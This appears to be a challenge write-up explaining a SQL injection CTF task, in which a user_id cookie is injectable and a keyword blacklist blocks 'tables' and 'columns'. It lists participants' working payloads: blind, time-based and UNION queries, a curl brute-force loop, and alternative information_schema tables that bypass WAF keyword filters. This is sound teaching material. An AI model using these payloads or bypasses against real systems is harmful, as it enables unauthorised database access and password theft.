Solutions for challenge 2A
A detailed explanation of the SQL Injection challenge 2A and the many solutions used to solve this challenge.
After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed out on the series of SQL Injection challenges I released a few months ago, they are currently still online and available to try out. There are 3 challenges, each with part A and B. Out of all the challenges, challenge 2A ended up being one of the easier ones and since the solutions didn't vary too much, I decided to pick this challenge to be the first to show the solutions to.
Explanation
DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.
What differentiates this challenge from the other challenges is that it allows you to log in as guest. In doing so, a welcome message is displayed showing the username and privileges and the cookie user_id is created. The cookie user_id, as the name says, has the id of the user, which in the case of guest is 1. If the value of the cookie is changed to 0, the message will now display admin as the username with administrator privileges. This is an indication that the username and privileges are determined from the user_id cookie, which is of course pulling that information from the MySQL database. Now that we know the injection point is in the cookie user_id, the next step is to figure out which characters are allowed and which are filtered.
The main idea behind this challenge is to figure out a way to retrieve the table/column names without using information_schema.tables/columns. For this reason, I decided to use very little filtering. Initially I had only blacklisted the following characters:
$blacklist = array('tables', 'columns', '(', ')');
Many WAF's rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker doesn't need those keywords in order the obtain the table/column names; I later added mysql_real_escape_string() as an extra layer of difficulty. Basically there are several other tables we can obtain the table/column names from other than information_schema.tables/columns, which are the two widely known ones. The only condition is that some require that the table/column have a key, and since each table should have a primary key, chances are high that this will work. Some examples are:
information_schema.key_column_usage
information_schema.table_constraints
information_schema.statistics
information_schema.partitions
Some of the solutions I received used a method I had not anticipated when writing the challenge. This type of solution guessed the column name and extracted the password through a blind SQLi. In hindsight I should have added a prefix to the column names, so they couldn't be guessed as easily. However, I did learn something because of it: I knew the LIKE statement doesn't require quotations, what I didn't know is that you could use the wildcards % and ? without the quotations. Below are the solutions that were submitted:
Solutions
Raz0r/BlackFan:
Solution omitted as it can be used to solve challenge 2B.
First Category
FluxReiners:
user_id=0 and username='admin' and mid(password,1,1)='e'
Team Rebel:
user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))
p____h:
user_id=0 and password LIKE "el%uitas"
NULL Life:
Submitted a PHP script found here.
mortis:
user_id=0 and username=0x656c25
tlk:
user_id=-1 OR password LIKE BINARY 0x{chars}25
g4mm4:
user_id=0 and password like binary 0x456c25
Submitted a Python script found here.
w00d:
user_id=0 and password like 0x[blind-here]25
gijs:
userid=0 and password >= BINARY 0x41
Karion:
for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl http://50.57.51.240/challenges/2A/challenge.php -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done
Second Category
Sebastien Blot:
userid=-1+union+select+1,2,table_name,4+from+information_schema.key_column_usage+limit+2,1--
Miroslav Stampar:
user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3
Paul da Silva:
userid=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1--
Dominus:
user_id=0+and+0=1+union+select+1,2,table_name,4+from+information_schema.statistics+limit+2,1
A full list of the victors for each challenge is available here.
Subscribe to our Newsletter
Get the latest cybersecurity insights and updates delivered to your inbox.